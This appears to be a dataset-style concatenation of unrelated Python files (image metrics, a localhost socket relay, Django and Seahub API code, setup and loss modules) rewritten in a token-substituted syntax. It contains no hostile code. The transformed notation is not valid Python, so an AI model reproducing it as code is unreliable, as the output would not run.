six.iteritems(mpl_table._cells)<block_start>cell.set_edgecolor(edge_color)<if_stmt>k[0]<eq>0<or>k[1]<l>header_columns<block_start>cell.set_text_props(weight='bold' color='w')<line_sep>cell.set_facecolor(header_color)<block_end><else_stmt><block_start>cell.set_facecolor(row_colors[k[0]%len(row_colors)])<block_end><block_end>qrcode=mpimg.imread('wechatqrcode.png')<line_sep>imagebox=OffsetImage(qrcode zoom=0.8)<line_sep>ab=AnnotationBbox(imagebox (0.1 0.5))<line_sep>ax2.axis("off")<line_sep>ax2.add_artist(ab)<line_sep>ax2.text(0.3 0.5 "欢迎扫码关注微信公众号\"时炜观察\"\n获取房价走势图以及在量化投资行业的知识见识分享。\n更有多家低佣A股证券开户。" dict(size=30))<line_sep>plt.tight_layout()<line_sep>plt.savefig(filename)<line_sep><return>ax<block_end><def_stmt>updateCityTable <block_start>df=pd.read_excel('rank/城市排名.xlsx')<line_sep>ax=render_mpl_table(df 'fig/city_table.png' header_columns=0 col_width=2.0)<block_end><def_stmt>updateAllTableImage <block_start>df=pd.read_excel('rank/城市排名.xlsx')<line_sep>render_mpl_table(df 'fig/allcity/table.png' header_columns=0 col_width=2.0)<for_stmt>city df['城市']<block_start>filename='rank/%s区域排名.xlsx'%city<line_sep>imgfilename='fig/%s/table.png'%city<line_sep>data=pd.read_excel(filename)<line_sep>render_mpl_table(data imgfilename header_columns=0 col_width=2.0)<block_end><block_end>
# Copyright (c) 2017-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## # mapping coco categories to cityscapes (our converted json) id # cityscapes # INFO roidb.py: 220: 1 bicycle: 7286 # INFO roidb.py: 220: 2 car: 53684 # INFO roidb.py: 220: 3 person: 35704 # INFO roidb.py: 220: 4 train: 336 # INFO roidb.py: 220: 5 truck: 964 # INFO roidb.py: 220: 6 motorcycle: 1468 # INFO roidb.py: 220: 7 bus: 758 # INFO roidb.py: 220: 8 rider: 3504 # coco (val5k) # INFO roidb.py: 220: 1 person: 21296 # INFO roidb.py: 220: 2 bicycle: 628 # INFO roidb.py: 220: 3 car: 3818 # INFO roidb.py: 220: 4 motorcycle: 732 # INFO roidb.py: 220: 5 airplane: 286 <------ irrelevant # INFO roidb.py: 220: 6 bus: 564 # INFO roidb.py: 220: 7 train: 380 # INFO roidb.py: 220: 8 truck: 828 <def_stmt>cityscapes_to_coco cityscapes_id<block_start>lookup={0:0 # ... background 1:2 # bicycle 2:3 # car 3:1 # person 4:7 # train 5:8 # truck 6:4 # motorcycle 7:6 # bus 8:-1 # rider (-1 means rand init) }<line_sep><return>lookup[cityscapes_id]<block_end><def_stmt>cityscapes_to_coco_with_rider cityscapes_id<block_start>lookup={0:0 # ... background 1:2 # bicycle 2:3 # car 3:1 # person 4:7 # train 5:8 # truck 6:4 # motorcycle 7:6 # bus 8:1 # rider ("person", *rider has human right!*) }<line_sep><return>lookup[cityscapes_id]<block_end><def_stmt>cityscapes_to_coco_without_person_rider cityscapes_id<block_start>lookup={0:0 # ... background 1:2 # bicycle 2:3 # car 3:-1 # person (ignore) 4:7 # train 5:8 # truck 6:4 # motorcycle 7:6 # bus 8:-1 # rider (ignore) }<line_sep><return>lookup[cityscapes_id]<block_end><def_stmt>cityscapes_to_coco_all_random cityscapes_id<block_start>lookup={0:-1 # ... background 1:-1 # bicycle 2:-1 # car 3:-1 # person (ignore) 4:-1 # train 5:-1 # truck 6:-1 # motorcycle 7:-1 # bus 8:-1 # rider (ignore) }<line_sep><return>lookup[cityscapes_id]<block_end>
# ------------------------------------------------------------------------ # Copyright (c) 2021 megvii-model. All Rights Reserved. # ------------------------------------------------------------------------ # Modified from BasicSR (https://github.com/xinntao/BasicSR) # Copyright 2018-2020 BasicSR Authors # ------------------------------------------------------------------------ <import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>basicsr.metrics.metric_util reorder_image to_y_channel<import_stmt>skimage.metrics<import_stmt>torch<def_stmt>calculate_psnr img1 img2 crop_border input_order='HWC' test_y_channel=<false><block_start>"""Calculate PSNR (Peak Signal-to-Noise Ratio). Ref: https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio Args: img1 (ndarray/tensor): Images with range [0, 255]/[0, 1]. img2 (ndarray/tensor): Images with range [0, 255]/[0, 1]. crop_border (int): Cropped pixels in each edge of an image. These pixels are not involved in the PSNR calculation. input_order (str): Whether the input order is 'HWC' or 'CHW'. Default: 'HWC'. test_y_channel (bool): Test on Y channel of YCbCr. Default: False. Returns: float: psnr result. """<assert_stmt>img1.shape<eq>img2.shape (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')<if_stmt>input_order<not><in>['HWC' 'CHW']<block_start><raise>ValueError(f'Wrong input_order {input_order}. Supported input_orders are '<concat>'"HWC" and "CHW"')<block_end><if_stmt>type(img1)<eq>torch.Tensor<block_start><if_stmt>len(img1.shape)<eq>4<block_start>img1=img1.squeeze(0)<block_end>img1=img1.detach().cpu().numpy().transpose(1 2 0)<block_end><if_stmt>type(img2)<eq>torch.Tensor<block_start><if_stmt>len(img2.shape)<eq>4<block_start>img2=img2.squeeze(0)<block_end>img2=img2.detach().cpu().numpy().transpose(1 2 0)<block_end>img1=reorder_image(img1 input_order=input_order)<line_sep>img2=reorder_image(img2 input_order=input_order)<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<if_stmt>crop_border<ne>0<block_start>img1=img1[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<line_sep>img2=img2[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<block_end><if_stmt>test_y_channel<block_start>img1=to_y_channel(img1)<line_sep>img2=to_y_channel(img2)<block_end>mse=np.mean((img1-img2)<power>2)<if_stmt>mse<eq>0<block_start><return>float('inf')<block_end>max_value=1.<if>img1.max()<le>1<else>255.<line_sep><return>20.<times>np.log10(max_value/np.sqrt(mse))<block_end><def_stmt>_ssim img1 img2<block_start>"""Calculate SSIM (structural similarity) for one channel images. It is called by func:`calculate_ssim`. Args: img1 (ndarray): Images with range [0, 255] with order 'HWC'. img2 (ndarray): Images with range [0, 255] with order 'HWC'. Returns: float: ssim result. """<line_sep>C1=(0.01<times>255)<power>2<line_sep>C2=(0.03<times>255)<power>2<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<line_sep>kernel=cv2.getGaussianKernel(11 1.5)<line_sep>window=np.outer(kernel kernel.transpose())<line_sep>mu1=cv2.filter2D(img1 -1 window)[5:-5 5:-5]<line_sep>mu2=cv2.filter2D(img2 -1 window)[5:-5 5:-5]<line_sep>mu1_sq=mu1<power>2<line_sep>mu2_sq=mu2<power>2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=cv2.filter2D(img1<power>2 -1 window)[5:-5 5:-5]-mu1_sq<line_sep>sigma2_sq=cv2.filter2D(img2<power>2 -1 window)[5:-5 5:-5]-mu2_sq<line_sep>sigma12=cv2.filter2D(img1<times>img2 -1 window)[5:-5 5:-5]-mu1_mu2<line_sep>ssim_map=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<line_sep><return>ssim_map.mean()<block_end><def_stmt>prepare_for_ssim img k<block_start><import_stmt>torch<with_stmt>torch.no_grad()<block_start>img=torch.from_numpy(img).unsqueeze(0).unsqueeze(0).float()<line_sep>conv=torch.nn.Conv2d(1 1 k stride=1 padding=k<floordiv>2 padding_mode='reflect')<line_sep>conv.weight.requires_grad=<false><line_sep>conv.weight[: : : :]=1./(k<times>k)<line_sep>img=conv(img)<line_sep>img=img.squeeze(0).squeeze(0)<line_sep>img=img[0::k 0::k]<block_end><return>img.detach().cpu().numpy()<block_end><def_stmt>prepare_for_ssim_rgb img k<block_start><import_stmt>torch<with_stmt>torch.no_grad()<block_start>img=torch.from_numpy(img).float()#HxWx3 conv=torch.nn.Conv2d(1 1 k stride=1 padding=k<floordiv>2 padding_mode='reflect')<line_sep>conv.weight.requires_grad=<false><line_sep>conv.weight[: : : :]=1./(k<times>k)<line_sep>new_img=[]<for_stmt>i range(3)<block_start>new_img.append(conv(img[: : i].unsqueeze(0).unsqueeze(0)).squeeze(0).squeeze(0)[0::k 0::k])<block_end><block_end><return>torch.stack(new_img dim=2).detach().cpu().numpy()<block_end><def_stmt>_3d_gaussian_calculator img conv3d<block_start>out=conv3d(img.unsqueeze(0).unsqueeze(0)).squeeze(0).squeeze(0)<line_sep><return>out<block_end><def_stmt>_generate_3d_gaussian_kernel <block_start>kernel=cv2.getGaussianKernel(11 1.5)<line_sep>window=np.outer(kernel kernel.transpose())<line_sep>kernel_3=cv2.getGaussianKernel(11 1.5)<line_sep>kernel=torch.tensor(np.stack([window<times>k<for>k kernel_3] axis=0))<line_sep>conv3d=torch.nn.Conv3d(1 1 (11 11 11) stride=1 padding=(5 5 5) bias=<false> padding_mode='replicate')<line_sep>conv3d.weight.requires_grad=<false><line_sep>conv3d.weight[0 0 : : :]=kernel<line_sep><return>conv3d<block_end><def_stmt>_ssim_3d img1 img2 max_value<block_start><assert_stmt>len(img1.shape)<eq>3<and>len(img2.shape)<eq>3<line_sep>"""Calculate SSIM (structural similarity) for one channel images. It is called by func:`calculate_ssim`. Args: img1 (ndarray): Images with range [0, 255]/[0, 1] with order 'HWC'. img2 (ndarray): Images with range [0, 255]/[0, 1] with order 'HWC'. Returns: float: ssim result. """<line_sep>C1=(0.01<times>max_value)<power>2<line_sep>C2=(0.03<times>max_value)<power>2<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<line_sep>kernel=_generate_3d_gaussian_kernel().cuda()<line_sep>img1=torch.tensor(img1).float().cuda()<line_sep>img2=torch.tensor(img2).float().cuda()<line_sep>mu1=_3d_gaussian_calculator(img1 kernel)<line_sep>mu2=_3d_gaussian_calculator(img2 kernel)<line_sep>mu1_sq=mu1<power>2<line_sep>mu2_sq=mu2<power>2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=_3d_gaussian_calculator(img1<power>2 kernel)-mu1_sq<line_sep>sigma2_sq=_3d_gaussian_calculator(img2<power>2 kernel)-mu2_sq<line_sep>sigma12=_3d_gaussian_calculator(img1<times>img2 kernel)-mu1_mu2<line_sep>ssim_map=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<line_sep><return>float(ssim_map.mean())<block_end><def_stmt>_ssim_cly img1 img2<block_start><assert_stmt>len(img1.shape)<eq>2<and>len(img2.shape)<eq>2<line_sep>"""Calculate SSIM (structural similarity) for one channel images. It is called by func:`calculate_ssim`. Args: img1 (ndarray): Images with range [0, 255] with order 'HWC'. img2 (ndarray): Images with range [0, 255] with order 'HWC'. Returns: float: ssim result. """<line_sep>C1=(0.01<times>255)<power>2<line_sep>C2=(0.03<times>255)<power>2<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<line_sep>kernel=cv2.getGaussianKernel(11 1.5)<line_sep># print(kernel) window=np.outer(kernel kernel.transpose())<line_sep>bt=cv2.BORDER_REPLICATE<line_sep>mu1=cv2.filter2D(img1 -1 window borderType=bt)<line_sep>mu2=cv2.filter2D(img2 -1 window borderType=bt)<line_sep>mu1_sq=mu1<power>2<line_sep>mu2_sq=mu2<power>2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=cv2.filter2D(img1<power>2 -1 window borderType=bt)-mu1_sq<line_sep>sigma2_sq=cv2.filter2D(img2<power>2 -1 window borderType=bt)-mu2_sq<line_sep>sigma12=cv2.filter2D(img1<times>img2 -1 window borderType=bt)-mu1_mu2<line_sep>ssim_map=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<line_sep><return>ssim_map.mean()<block_end><def_stmt>calculate_ssim img1 img2 crop_border input_order='HWC' test_y_channel=<false><block_start>"""Calculate SSIM (structural similarity). Ref: Image quality assessment: From error visibility to structural similarity The results are the same as that of the official released MATLAB code in https://ece.uwaterloo.ca/~z70wang/research/ssim/. For three-channel images, SSIM is calculated for each channel and then averaged. Args: img1 (ndarray): Images with range [0, 255]. img2 (ndarray): Images with range [0, 255]. crop_border (int): Cropped pixels in each edge of an image. These pixels are not involved in the SSIM calculation. input_order (str): Whether the input order is 'HWC' or 'CHW'. Default: 'HWC'. test_y_channel (bool): Test on Y channel of YCbCr. Default: False. Returns: float: ssim result. """<assert_stmt>img1.shape<eq>img2.shape (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')<if_stmt>input_order<not><in>['HWC' 'CHW']<block_start><raise>ValueError(f'Wrong input_order {input_order}. Supported input_orders are '<concat>'"HWC" and "CHW"')<block_end><if_stmt>type(img1)<eq>torch.Tensor<block_start><if_stmt>len(img1.shape)<eq>4<block_start>img1=img1.squeeze(0)<block_end>img1=img1.detach().cpu().numpy().transpose(1 2 0)<block_end><if_stmt>type(img2)<eq>torch.Tensor<block_start><if_stmt>len(img2.shape)<eq>4<block_start>img2=img2.squeeze(0)<block_end>img2=img2.detach().cpu().numpy().transpose(1 2 0)<block_end>img1=reorder_image(img1 input_order=input_order)<line_sep>img2=reorder_image(img2 input_order=input_order)<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<if_stmt>crop_border<ne>0<block_start>img1=img1[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<line_sep>img2=img2[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<block_end><if_stmt>test_y_channel<block_start>img1=to_y_channel(img1)<line_sep>img2=to_y_channel(img2)<line_sep><return>_ssim_cly(img1[<ellipsis> 0] img2[<ellipsis> 0])<block_end>ssims=[]<line_sep># ssims_before = [] # skimage_before = skimage.metrics.structural_similarity(img1, img2, data_range=255., multichannel=True) # print('.._skimage', # skimage.metrics.structural_similarity(img1, img2, data_range=255., multichannel=True)) max_value=1<if>img1.max()<le>1<else>255<with_stmt>torch.no_grad()<block_start>final_ssim=_ssim_3d(img1 img2 max_value)<line_sep>ssims.append(final_ssim)<block_end># for i in range(img1.shape[2]): # ssims_before.append(_ssim(img1, img2)) # print('..ssim mean , new {:.4f} and before {:.4f} .... skimage before {:.4f}'.format(np.array(ssims).mean(), np.array(ssims_before).mean(), skimage_before)) # ssims.append(skimage.metrics.structural_similarity(img1[..., i], img2[..., i], multichannel=False)) <return>np.array(ssims).mean()<block_end>
# Copyright 2013 The Emscripten Authors. All rights reserved. # Emscripten is available under two separate licenses, the MIT license and the # University of Illinois/NCSA Open Source License. Both these licenses can be # found in the LICENSE file. """Listens on 2 ports and relays between them. Listens to ports A and B. When someone connects to port A, and then sends some data to port A, that data is sent to someone who connected to socket B. And so forth. This is different than say socat which will listen to one port and then make a connection to another port, and do bidirectional communication. We need to actually listen on both ports. """<import_stmt>sys<import_stmt>socket<import_stmt>time<import_stmt>threading<line_sep>ports=[int(sys.argv[1]) int(sys.argv[2])]<class_stmt>Listener(threading.Thread)<block_start><def_stmt>run self<block_start>self.conn=<none><line_sep>s=socket.socket(socket.AF_INET socket.SOCK_STREAM)<line_sep><global>ports<line_sep>port=ports[0]<line_sep>ports=ports[1:]<line_sep>print('listener binding to ' port)<line_sep>s.bind(('127.0.0.1' port))<line_sep>s.listen(1)<line_sep>print('listener' port 'waiting for connection')<line_sep>conn,addr=s.accept()<line_sep>self.conn=conn<while_stmt><true><block_start>time.sleep(0.5)<line_sep>print('listener' port 'waiting for data')<line_sep>data=conn.recv(20<times>1024)<if_stmt><not>data<block_start><continue><block_end><while_stmt><not>self.other.conn<block_start>print('listener' port 'waiting for other connection in order to send data')<line_sep>time.sleep(1)<block_end>print('listener' port 'sending data' len(data))<line_sep>self.other.conn.send(data)<block_end><block_end><block_end>in_listener=Listener()<line_sep>in_listener.daemon=<true><line_sep>in_listener.start()<line_sep>out_listener=Listener()<line_sep>out_listener.daemon=<true><line_sep>out_listener.start()<line_sep>in_listener.other=out_listener<line_sep>out_listener.other=in_listener<while_stmt><true><block_start>time.sleep(1)<block_end>
<import_stmt>logging<import_stmt>requests<import_stmt>json<import_from_stmt>rest_framework status<import_from_stmt>rest_framework.authentication SessionAuthentication<import_from_stmt>rest_framework.permissions IsAuthenticated<import_from_stmt>rest_framework.response Response<import_from_stmt>rest_framework.views APIView<import_from_stmt>seahub.api2.authentication TokenAuthentication<import_from_stmt>seahub.api2.throttling UserRateThrottle<import_from_stmt>seahub.api2.utils api_error<import_from_stmt>seahub.ocm.models OCMShareReceived<import_from_stmt>seahub.ocm.settings VIA_REPO_TOKEN_URL<import_from_stmt>seahub.constants PERMISSION_READ_WRITE<line_sep>logger=logging.getLogger(__name__)<def_stmt>send_get_request url params=<none> headers=<none><block_start>response=requests.get(url params=params headers=headers)<line_sep><return>json.loads(response.text)<block_end><class_stmt>OCMReposDirView(APIView)<block_start>authentication_classes=(TokenAuthentication SessionAuthentication)<line_sep>permission_classes=(IsAuthenticated )<line_sep>throttle_classes=(UserRateThrottle )<def_stmt>get self request provider_id repo_id<block_start>""" Send request to Provider to get repo item list """<line_sep>path=request.GET.get('path' '/')<line_sep>with_thumbnail=request.GET.get('with_thumbnail' 'false')<if_stmt>with_thumbnail<not><in>('true' 'false')<block_start>error_msg='with_thumbnail invalid.'<line_sep><return>api_error(status.HTTP_400_BAD_REQUEST error_msg)<block_end>ocm_share_received=OCMShareReceived.objects.filter(provider_id=provider_id repo_id=repo_id).first()<if_stmt><not>ocm_share_received<block_start>error_msg='Library %s not found.'%repo_id<line_sep><return>api_error(status.HTTP_404_NOT_FOUND error_msg)<block_end><if_stmt>ocm_share_received.to_user<ne>request.user.username<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end>url=ocm_share_received.from_server_url+VIA_REPO_TOKEN_URL['DIR']<line_sep>params={'path':path 'with_thumbnail':with_thumbnail }<line_sep>headers={'Authorization':'token '+ocm_share_received.shared_secret}<try_stmt><block_start>resp=send_get_request(url params=params headers=headers)<block_end><except_stmt>Exception<as>e<block_start>logging.error(e)<line_sep><return>api_error(status.HTTP_500_INTERNAL_SERVER_ERROR 'Internal Server Error')<block_end><return>Response(resp)<block_end><block_end><class_stmt>OCMReposDownloadLinkView(APIView)<block_start>authentication_classes=(TokenAuthentication SessionAuthentication)<line_sep>permission_classes=(IsAuthenticated )<line_sep>throttle_classes=(UserRateThrottle )<def_stmt>get self request provider_id repo_id<block_start>""" Send request to Provider to get download link """<line_sep>path=request.GET.get('path' '/')<line_sep>ocm_share_received=OCMShareReceived.objects.filter(provider_id=provider_id repo_id=repo_id).first()<if_stmt><not>ocm_share_received<block_start>error_msg='Library %s not found.'%repo_id<line_sep><return>api_error(status.HTTP_404_NOT_FOUND error_msg)<block_end><if_stmt>ocm_share_received.to_user<ne>request.user.username<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end>url=ocm_share_received.from_server_url+VIA_REPO_TOKEN_URL['DOWNLOAD_LINK']<line_sep>params={'path':path }<line_sep>headers={'Authorization':'token '+ocm_share_received.shared_secret}<try_stmt><block_start>resp=send_get_request(url params=params headers=headers)<block_end><except_stmt>Exception<as>e<block_start>logging.error(e)<line_sep><return>api_error(status.HTTP_500_INTERNAL_SERVER_ERROR 'Internal Server Error')<block_end><return>Response(resp)<block_end><block_end><class_stmt>OCMReposUploadLinkView(APIView)<block_start>authentication_classes=(TokenAuthentication SessionAuthentication)<line_sep>permission_classes=(IsAuthenticated )<line_sep>throttle_classes=(UserRateThrottle )<def_stmt>get self request provider_id repo_id<block_start>""" Send request to Provider to get upload link """<line_sep>path=request.GET.get('path' '/')<line_sep>ocm_share_received=OCMShareReceived.objects.filter(provider_id=provider_id repo_id=repo_id).first()<if_stmt><not>ocm_share_received<block_start>error_msg='Library %s not found.'%repo_id<line_sep><return>api_error(status.HTTP_404_NOT_FOUND error_msg)<block_end><if_stmt>ocm_share_received.to_user<ne>request.user.username<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end><if_stmt>ocm_share_received.permission<ne>PERMISSION_READ_WRITE<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end>url=ocm_share_received.from_server_url+VIA_REPO_TOKEN_URL['UPLOAD_LINK']<line_sep>params={'path':path 'from':'web' }<line_sep>headers={'Authorization':'token '+ocm_share_received.shared_secret}<try_stmt><block_start>resp=send_get_request(url params=params headers=headers)<block_end><except_stmt>Exception<as>e<block_start>logging.error(e)<line_sep><return>api_error(status.HTTP_500_INTERNAL_SERVER_ERROR 'Internal Server Error')<block_end><return>Response(resp)<block_end><block_end>
<import_from_stmt>setuptools setup find_packages<import_stmt>sys<import_stmt>os.path<import_stmt>numpy<as>np<line_sep># Must be one line or PyPI will cut it off DESC=("A colormap tool")<line_sep>LONG_DESC=open("README.rst").read()<line_sep>setup(name="viscm" version="0.9" description=DESC long_description=LONG_DESC author="<NAME>, <NAME>" author_email="<EMAIL>, <EMAIL>" url="https://github.com/bids/viscm" license="MIT" classifiers=["Development Status :: 3 - Alpha" "Intended Audience :: Developers" "Intended Audience :: Science/Research" "License :: OSI Approved :: MIT License" "Programming Language :: Python :: 2" "Programming Language :: Python :: 3" ] packages=find_packages() install_requires=["numpy" "matplotlib" "colorspacious"] package_data={'viscm':['examples/*']} )<line_sep>
# ------------------------------------------------------------------------------- # Copyright IBM Corp. 2017 # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------------- __all__=['packageManager' 'display' 'services' 'utils']<import_stmt>warnings<with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore")<try_stmt>#Check if we have an python shell available, if not, use our ProxyShell <block_start>get_ipython()<block_end><except_stmt>NameError<block_start><import_from_stmt>.proxyShell ProxyInteractiveShell<line_sep>ProxyInteractiveShell.instance()<block_end>#shortcut to logging <import_stmt>pixiedust.utils.pdLogging<as>pdLogging<line_sep>logger=pdLogging.getPixiedustLogger()<line_sep>getLogger=pdLogging.getLogger<import_from_stmt>pixiedust.utils.environment Environment<if_stmt>Environment.hasSpark#shortcut to packageManager <block_start><import_stmt>pixiedust.packageManager<as>packageManager<line_sep>printAllPackages=packageManager.printAllPackages<line_sep>installPackage=packageManager.installPackage<line_sep>uninstallPackage=packageManager.uninstallPackage<try_stmt><block_start><import_from_stmt>py4j.protocol Py4JJavaError<line_sep>#javaBridge and scalaBridge only work in the driver, not an executor <import_from_stmt>pixiedust.utils.javaBridge *<import_from_stmt>pixiedust.utils.scalaBridge *<line_sep>#shortcut to Spark job monitoring <import_from_stmt>pixiedust.utils.sparkJobProgressMonitor enableSparkJobProgressMonitor<line_sep>enableJobMonitor=enableSparkJobProgressMonitor<block_end><except_stmt>(NameError Py4JJavaError)#IPython not available we must be in a spark executor <block_start><pass><block_end><block_end>#automated import into the user namespace <try_stmt><block_start><import_from_stmt>IPython.core.getipython get_ipython<import_from_stmt>pixiedust.display display<import_stmt>pixiedust.services<if_stmt>"display"<not><in>get_ipython().user_ns#be nice, only set the display variable on the user namespace if it's not already taken <block_start>get_ipython().user_ns["display"]=display<block_end><import_from_stmt>pixiedust.utils.sampleData sampleData<import_stmt>pixiedust.apps.debugger<import_from_stmt>pixiedust.utils checkVersion<import_from_stmt>pixiedust.utils.storage optOut optIn<line_sep>checkVersion()<block_end><except_stmt>(NameError)#IPython not available we must be in a spark executor <block_start><pass><block_end><block_end>
""" @author : <NAME> @date : 1 - 23 - 2021 The loss functions are really simple. You just need to understand whether it is a classification or regression task. All losses will be set in the model.finalize() model. """<import_stmt>numpy<as>np<import_stmt>warnings<import_from_stmt>scipy.special softmax<as>sfmx_indiv<line_sep>warnings.filterwarnings("ignore" category=RuntimeWarning)<class_stmt>Loss<block_start>"""Base loss class."""<def_stmt>__init__ self<block_start>self.SGD=<false><block_end><def_stmt>loss self y y_pred<block_start><pass><block_end><def_stmt>grad self y y_pred<block_start><pass><block_end><block_end><class_stmt>MSE(Loss)<block_start>""" MSE stands for mean-squared error, and its the loss you'll want to use for regression. To set it in the model.finalize() method just do: >>> from sealion import neural_networks as nn >>> model = nn.models.NeuralNetwork(layers_list) >>> model.finalize(loss=nn.loss.MSE(), optimizer=...) and you're all set! """<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.type_regression=<true><block_end><def_stmt>loss self y y_pred<block_start>error=np.sum(np.power(y_pred-y 2))/(2<times>len(y))<line_sep><return>error<block_end><def_stmt>grad self y y_pred<block_start><return>(y_pred-y)/len(y)<block_end><block_end><def_stmt>softmax x<block_start>softmax_output=np.apply_along_axis(sfmx_indiv 1 x)<line_sep><return>softmax_output<block_end><class_stmt>CrossEntropy(Loss)<block_start>""" This loss function is for classification problems. I know there's a binary log loss and then a multi-category cross entropy loss function for classification, but they're essentially the same thing so I thought using one class would make it easier. Remember to use one-hot encoded data for this to work (check out utils). If you are using this loss function, make sure your last layer is Softmax and vice versa. Otherwise, annoying error messages will occur. To set this in the ``model.finalize()`` method do: >>> from sealion import neural_networks as nn >>> model = nn.models.NeuralNetwork() >>> # ... add the layers ... >>> model.add(nn.layers.Softmax()) # last layer has to be softmax >>> model.finalize(loss=nn.loss.CrossEntropy(), optimizer=...) and that's all there is to it. """<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.type_regression=<false><block_end><def_stmt>loss self y y_pred<block_start><return>np.sum(y<times>np.log(y_pred+1e-20))/len(y)<block_end># now give the crossentropy loss <def_stmt>grad self y y_pred<block_start>y_pred=softmax(y_pred)<line_sep><return>(y_pred-y)/len(y)<block_end><block_end># give the sexy partial derivative
# Generated by Django 1.10.8 on 2017-10-12 10:35 <import_from_stmt>django.db migrations models<import_stmt>jsonfield.fields<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[]<line_sep>operations=[migrations.CreateModel(name='StartEnterpriseDeliveryReceipt' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('sms_id' models.CharField(db_index=<true> max_length=126)) ('message_id' models.CharField(db_index=<true> max_length=126 unique=<true>)) ('received_on' models.DateTimeField(db_index=<true> null=<true>)) ('info' jsonfield.fields.JSONField(default=dict null=<true>)) ] ) ]<block_end>
<import_from_stmt>optparse OptionParser<import_stmt>json<import_stmt>sys<import_stmt>os<line_sep>usage=""" <Script> [Options] [Options] -h, --help Show this help message and exit. -a, --add Goes straight to the add script phase """<line_sep># Load args parser=OptionParser()<line_sep>parser.add_option("-a" "--add" action="store_true" dest="add" help="Goes straight to the add script phase")<line_sep># The database is automatically updated after the PR is merged. # ONLY Use this function if you were asked to, to manually add projects to the database. <def_stmt>add_script <block_start>""" Add a Contributor script through a series of inputs """<line_sep>print("Double check inputs before pressing enter. If one input is incorrect press CTRL-C and re-run the script")<line_sep>category=input("Enter What category does your script belongs to > ")<line_sep>name=input("Enter script title > ")<line_sep>path=input("Enter folder name that contains your script > ")<line_sep>requirments_path=input("Enter requirements.txt path (else none) > ")<line_sep>entry=input("Enter name of the file that runs the script > ")<line_sep>arguments=input("Enter scripts arugments if needed ( '-' seperated + no whitespaces) (else none) > ")<line_sep>contributor=input("Enter your GitHub username > ")<line_sep>description=input("Enter a description for your script > ")<line_sep>new_data={category:{name:[path entry arguments requirments_path contributor description]}}<line_sep>data_store=read_data()<try_stmt># If category doesn't exist try will fail and except will ask to add a new category with the project <block_start><if_stmt>data_store[category]# Check for existing category or a new one <block_start>data_store[category].update(new_data[category])# Add script <block_end><block_end><except_stmt><block_start>sure="Y"<line_sep>sure=input("A new category is about to be added. You sure? Y/n > ")<if_stmt>sure.lower()<eq>"y"<or>sure<eq>""<block_start>data_store.update(new_data)# Add new category <block_end><else_stmt><block_start>print("Data wasn't added please re-run the script and add the correct inputs.")<line_sep>sys.exit(1)<block_end><block_end><with_stmt>open("datastore.json" "w")<as>file<block_start>json.dump(data_store file)<block_end>print("Script added to database")<block_end><def_stmt>read_data <block_start>""" Loads datastore.json """<with_stmt>open("datastore.json" "r")<as>file<block_start>data=json.load(file)<block_end><return>data<block_end><def_stmt>check_data <block_start>""" Validates that all projects exists in the datastore and prints out those are not in the DB """<line_sep>data=read_data()<line_sep>paths=[]<for_stmt>category data<block_start><for_stmt>project data[category]<block_start>paths.append(data[category][project][0])<block_end><block_end>i=0<line_sep>repo_dir=os.listdir("../")<line_sep>ignore=[".deepsource.toml" ".git" ".github" ".gitignore" "CODE_OF_CONDUCT.md" "CONTRIBUTING.md" "LICENSE" "README.md" "SCRIPTS.md" "script_updater.py" "Template for README.md" "Master Script" ]<for_stmt>element repo_dir<block_start><if_stmt>(<not>element<in>paths)<and>(<not>element<in>ignore)<block_start>print(element)<line_sep>i<augadd>1<block_end><block_end>print(f"Total of {i} non-added projects.")<block_end># Start checkpoint <if_stmt>__name__<eq>"__main__"<block_start>(options args)=parser.parse_args()<line_sep># Inputs add=options.add<if_stmt>add<block_start>add_script()<block_end>#add_script() check_data()<block_end>
